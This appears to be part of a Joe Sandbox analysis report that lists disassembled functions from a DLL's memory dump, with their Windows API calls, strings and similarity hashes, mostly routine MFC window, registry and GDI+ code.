Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 6CB1DE9E
GetParent.USER32(?), ref: 6CB1DEAC
GetParent.USER32(?), ref: 6CB1DEC3
GetLastActivePopup.USER32(?), ref: 6CB1DED6
IsWindowEnabled.USER32(?), ref: 6CB1DEEA
EnableWindow.USER32(?,00000000), ref: 6CB1DEFD

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: be4e83f75359155655731abafd99bc098770428f1cc17a37b33ee3df9e23f2ce
Instruction ID: edc9ab2591f9702980fd3187890aec62ddabf7e4664760fa1ab016e538175e01
Opcode Fuzzy Hash: be4e83f75359155655731abafd99bc098770428f1cc17a37b33ee3df9e23f2ce
Instruction Fuzzy Hash: 7311C17370E66157DF131A3A6A88B5B7ABCDF27B5AB150214EC10D3F40EB60DC0086A2

Function 6CB1D4A2 Relevance: 9.1, APIs: 6, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegDeleteKeyW.ADVAPI32(00000000,?), ref: 6CB1D4CA
RegDeleteValueW.ADVAPI32(00000000,?,?,00000000), ref: 6CB1D4EA
RegCloseKey.ADVAPI32(00000000), ref: 6CB1D517

Part of subcall function 6CB1CD49: RegCloseKey.ADVAPI32(00000000), ref: 6CB1CDEE
Part of subcall function 6CB1CD49: RegCloseKey.ADVAPI32(00000000), ref: 6CB1CDFD

_wcslen.LIBCMT ref: 6CB1D4F9
RegSetValueExW.ADVAPI32(00000000,?,00000000,00000001,?,00000000,?,00000000), ref: 6CB1D50E
WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 6CB1D532

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Close$DeleteValue$PrivateProfileStringWrite_wcslen
String ID:
API String ID: 3964697592-0
Opcode ID: 531002988021be37a2c616f9af12be97c176f453cf9e608d29228c886d70e967
Instruction ID: 3879cdbe62683bef07ed0c988eb904765a702c4072969fd12aee22d342625df1
Opcode Fuzzy Hash: 531002988021be37a2c616f9af12be97c176f453cf9e608d29228c886d70e967
Instruction Fuzzy Hash: ED11C63314A5A5BBDB131F76AC44E8F3F79EF46364B154024F9099BD10DB31D91297A0

Function 6CC568EE Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6CC5649B,6CC5126E,6CC5187F,?,6CC51A8F,?,00000001,?,?,00000001,?,6CD213B0,0000000C,6CC51B78), ref: 6CC568FC
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CC5690A
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CC56923
SetLastError.KERNEL32(00000000,6CC51A8F,?,00000001,?,?,00000001,?,6CD213B0,0000000C,6CC51B78,?,00000001,?), ref: 6CC56975

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 78d140848c1dfb80e6bf54e3720dd3ef974e7d28b230fd2a44f4690a69665fde
Instruction ID: 32f8695359eee145ee9d1c37c30253e213e244693353cf32724a5414841c10b8
Opcode Fuzzy Hash: 78d140848c1dfb80e6bf54e3720dd3ef974e7d28b230fd2a44f4690a69665fde
Instruction Fuzzy Hash: 3301D87234DF119EAB210A7A6C846572A78EB03B7C7A40329F620D6BD0FF218835915C

Function 6CB2201D Relevance: 9.0, APIs: 6, Instructions: 48windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 6CB22021
GetParent.USER32(00000000), ref: 6CB22042

Part of subcall function 6CB22393: GetWindowLongW.USER32(?,000000F0), ref: 6CB223B2
Part of subcall function 6CB22393: GetClassNameW.USER32(?,?,0000000A), ref: 6CB223C7

GetWindowLongW.USER32(?,000000F0), ref: 6CB22061
GetParent.USER32(?), ref: 6CB2206F
GetDesktopWindow.USER32 ref: 6CB22077
SendMessageW.USER32(00000000,0000014F,00000000,00000000), ref: 6CB2208B

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Window$LongParent$ClassDesktopFocusMessageNameSend
String ID:
API String ID: 3020784601-0
Opcode ID: 1d8bedf0397fb5182b868d509228c8c88ec316e71ac1b554032ca66c68e74064
Instruction ID: 0259820a20b975e720438e8b83cf44fd55658664befc961c9a7a39912857e4b8
Opcode Fuzzy Hash: 1d8bedf0397fb5182b868d509228c8c88ec316e71ac1b554032ca66c68e74064
Instruction Fuzzy Hash: 65F08F3131265166DF111634894DB7FA97CDB83F74F240124FD1AE7680DB28C8428053

Function 6CB5842A Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 225windowCOMMON

Download Yara Rule

APIs

Part of subcall function 6CB59937: GdipGetImagePixelFormat.GDIPLUS(?,6CD5991C,00000000,00000000,?,6CB58458,?,00000000,6CD5991C), ref: 6CB59945

GdipBitmapLockBits.GDIPLUS(00000000,?,00000001,?,?,00000000,00000000,?,00000000,00000000,?,?,00000000,6CD5991C), ref: 6CB5863A

Part of subcall function 6CB59911: GdipGetImagePaletteSize.GDIPLUS(00000000,00000000,00000000,?,?,6CB5851A,00000000,00000000,?,00000000,00000000,?,?,00000000), ref: 6CB59923

GdipBitmapUnlockBits.GDIPLUS(00000000,?,00000000,?,00000001,?,?,00000000,00000000,?,00000000,00000000,?,?,00000000,6CD5991C), ref: 6CB586F7

Part of subcall function 6CB56885: GdipCreateBitmapFromScan0.GDIPLUS(00000000,?,?,00000000,00000000,6CD5991C,00000000,?,?,6CB5871D,?,?,?,00022009,?,00000000), ref: 6CB568AC

Part of subcall function 6CB56A86: GdipGetImageGraphicsContext.GDIPLUS(?,6CD5991C,00000000,?,?,6CB5872F,?,?,?,?,00022009,?,00000000,00000000,?,00000000), ref: 6CB56AA0

GdipDeleteGraphics.GDIPLUS(?,?,00000000,00000000,?,?,?,?,00022009,?,00000000,00000000,?,00000000,00000000,?), ref: 6CB58748
GdipDisposeImage.GDIPLUS(?,?,?,00000000,00000000,?,?,?,?,00022009,?,00000000,00000000,?,00000000,00000000), ref: 6CB58753

Strings

&, xrefs: 6CB5849B

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Gdip$Image$Bitmap$BitsGraphics$ContextCreateDeleteDisposeFormatFromLockPalettePixelScan0SizeUnlock
String ID: &
API String ID: 157952678-3042966939
Opcode ID: dda1334cf207e209aae5e1644d4ce78a97a24bf5c7e9ef8d0c0a67e28023e24f
Instruction ID: 19bc78152cf34e5fb00b2203ba68e365400ffafa955e2a243aed122ff2664ad5
Opcode Fuzzy Hash: dda1334cf207e209aae5e1644d4ce78a97a24bf5c7e9ef8d0c0a67e28023e24f
Instruction Fuzzy Hash: 38914EF1A011699FDB248F14CD90AD9B7B4EF48308F8041EAAA09A7641D731AED5CF99

Function 6CB1B329 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 219COMMON

Download Yara Rule

Strings

RestartByRestartManager, xrefs: 6CB1B433
%08lX-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X, xrefs: 6CB1B40B

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID:
String ID: %08lX-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X$RestartByRestartManager
API String ID: 0-5890034
Opcode ID: a66b564d32884a64c90145dcdbdc1f0ebe4eccfe4b23df3e6a555ce6f0dc694d
Instruction ID: 9a6792f7737eb49ef885197fe4afd224e48781e31e14f31dec6772db67b7cb4f
Opcode Fuzzy Hash: a66b564d32884a64c90145dcdbdc1f0ebe4eccfe4b23df3e6a555ce6f0dc694d
Instruction Fuzzy Hash: 7F816271D04149AFCF05DFA8D894EEEB7B9AF18318F144068E511A7BA1EB34AD09CF64

Function 6CB29A26 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 219windowCOMMON

Download Yara Rule

APIs

Part of subcall function 6CB1EA42: __EH_prolog3.LIBCMT ref: 6CB1EA5A

SendMessageW.USER32(?,00000433,00000000,?), ref: 6CB29BFF
GetWindowLongW.USER32(?,000000FC), ref: 6CB29C0A
GetWindowLongW.USER32(?,000000FC), ref: 6CB29C1E
SetWindowLongW.USER32(?,000000FC,00000000), ref: 6CB29C46

Strings

,, xrefs: 6CB29BE7

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: LongWindow$H_prolog3MessageSend
String ID: ,
API String ID: 4140968126-3772416878
Opcode ID: 150c353c17138f7e1f4e67c73c448d85ee6d79af3d97dbc86c7632850164c6c1
Instruction ID: d5062470932ac86d6a8dd1803b87d1a563717f03d1bd63d2dd6fc5bcc430dd37
Opcode Fuzzy Hash: 150c353c17138f7e1f4e67c73c448d85ee6d79af3d97dbc86c7632850164c6c1
Instruction Fuzzy Hash: 5171F431F00255ABDB04AF75C894ABD77B6FF49318B100169D81D9BB50EB34E8158B95

Function 6CB3B057 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32(?,?,0000000A,System,6CB3B23F,System,?,?,?,00000000), ref: 6CB3B074

Strings

System, xrefs: 6CB3B06F

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: GlobalLock
String ID: System
API String ID: 2848605275-3470857405
Opcode ID: 6352e520f1e2f4c9c14169d9407ed81365f90782ba582da4c94685d19ae7ce6b
Instruction ID: d7ce187dbc5585ed55cdda557f766e956b5089adf371a9afb6ccedc0b5525746
Opcode Fuzzy Hash: 6352e520f1e2f4c9c14169d9407ed81365f90782ba582da4c94685d19ae7ce6b
Instruction Fuzzy Hash: 1D41F731A1097ADFDB14CF68C845ABFB7B4FF41304F14862AE429D7A44EB349A54CB90

Function 6CB300F2 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB300F9

Part of subcall function 6CB1A044: __EH_prolog3.LIBCMT ref: 6CB1A0F2

Strings

Invalid DateTime, xrefs: 6CB30178, 6CB301F3

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: H_prolog3
String ID: Invalid DateTime
API String ID: 431132790-2190634649
Opcode ID: d33bcecb506feceb670f2734a8ae2843360f58e8fabb32e9988bcd0e1f1105df
Instruction ID: 55e4512a64e679917a06fefd203f77cd3a3883c2452bb79c0bff50125addac9f
Opcode Fuzzy Hash: d33bcecb506feceb670f2734a8ae2843360f58e8fabb32e9988bcd0e1f1105df
Instruction Fuzzy Hash: DA41B1319444D9ABCF059FA4DC549EFBB78AF01358B244218F416ABFD0DB309A48CBA5

Function 6CB4F718 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB4F71F
SysStringLen.OLEAUT32(?), ref: 6CB4F75F
SysStringLen.OLEAUT32(?), ref: 6CB4F780
SysFreeString.OLEAUT32(?), ref: 6CB4F802

Strings

@, xrefs: 6CB4F7A2

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: String$FreeH_prolog3
String ID: @
API String ID: 315669285-2766056989
Opcode ID: 11fce1ae3d032868174470d15580a6f994c8333a1c74cb286c96da227e8e49e6
Instruction ID: b8d30a1e111e92e03bd3dfb80c9e5dac97ebe9dfbf59027b0557801d6a7f2a2b
Opcode Fuzzy Hash: 11fce1ae3d032868174470d15580a6f994c8333a1c74cb286c96da227e8e49e6
Instruction Fuzzy Hash: 14316D71901249AFDF01CFA8C8449EF7BB9EF09314F104029F925AB794E734D915CB91

Function 6CB526BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 84COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB526C5

Part of subcall function 6CBC770F: __EH_prolog3.LIBCMT ref: 6CBC7716

Part of subcall function 6CB2D542: GetDlgCtrlID.USER32(?), ref: 6CB2D54D

Strings

%TsBasePane-%d%x, xrefs: 6CB5272C
BasePanes, xrefs: 6CB526D2
%TsBasePane-%d, xrefs: 6CB52715
IsVisible, xrefs: 6CB52781

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: H_prolog3$Ctrl
String ID: %TsBasePane-%d$%TsBasePane-%d%x$BasePanes$IsVisible
API String ID: 3879667756-2169875744
Opcode ID: 40a9a9de0e870fe78d4555dc8cbbbe8b70ddf8188143c386be8b41ef25f70a3b
Instruction ID: 084c59286f4f5cbaa1e352e595b723a3200568fdc63e79283af3db43a4a69b00
Opcode Fuzzy Hash: 40a9a9de0e870fe78d4555dc8cbbbe8b70ddf8188143c386be8b41ef25f70a3b
Instruction Fuzzy Hash: 3431A071D011899BCF00DFB4CC948FEB776BF94218F140529D52267BA0EB349919CB61

Function 6CB51EDC Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 84COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB51EE3

Part of subcall function 6CBC770F: __EH_prolog3.LIBCMT ref: 6CBC7716

Part of subcall function 6CB2D542: GetDlgCtrlID.USER32(?), ref: 6CB2D54D

Strings

%TsBasePane-%d%x, xrefs: 6CB51F4D
BasePanes, xrefs: 6CB51EF3
%TsBasePane-%d, xrefs: 6CB51F36
IsVisible, xrefs: 6CB51F9B

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: H_prolog3$Ctrl
String ID: %TsBasePane-%d$%TsBasePane-%d%x$BasePanes$IsVisible
API String ID: 3879667756-2169875744
Opcode ID: 73d67c4fca3a756ee52252c8df27347798cb92c56d97676e1fd4c62bc54b4ff1
Instruction ID: 6de5c6ac06848f75f39f61ba9b936bdc2d7edd80ca3af2888526b9d1efd0a151
Opcode Fuzzy Hash: 73d67c4fca3a756ee52252c8df27347798cb92c56d97676e1fd4c62bc54b4ff1
Instruction Fuzzy Hash: C931A071D002499BCF00DFA4C8909EEBBB5FF48318F540569E515BBB90EB359E19CB61

Function 6CB40A01 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 76COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB40A08

Part of subcall function 6CB3A22E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 6CB3A243

Part of subcall function 6CB846CA: __EH_prolog3.LIBCMT ref: 6CB846D1

Part of subcall function 6CB8602D: __EH_prolog3.LIBCMT ref: 6CB86034

Strings

MFCComboBox_ShowDeviceTypeFonts, xrefs: 6CB40A93
MFCComboBox_ShowTrueTypeFonts, xrefs: 6CB40A69
MFCComboBox_ShowRasterTypeFonts, xrefs: 6CB40A7E
MFCComboBox_DrawUsingFont, xrefs: 6CB40A41

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: H_prolog3$ByteCharMultiWide
String ID: MFCComboBox_DrawUsingFont$MFCComboBox_ShowDeviceTypeFonts$MFCComboBox_ShowRasterTypeFonts$MFCComboBox_ShowTrueTypeFonts
API String ID: 2949695960-1084877596
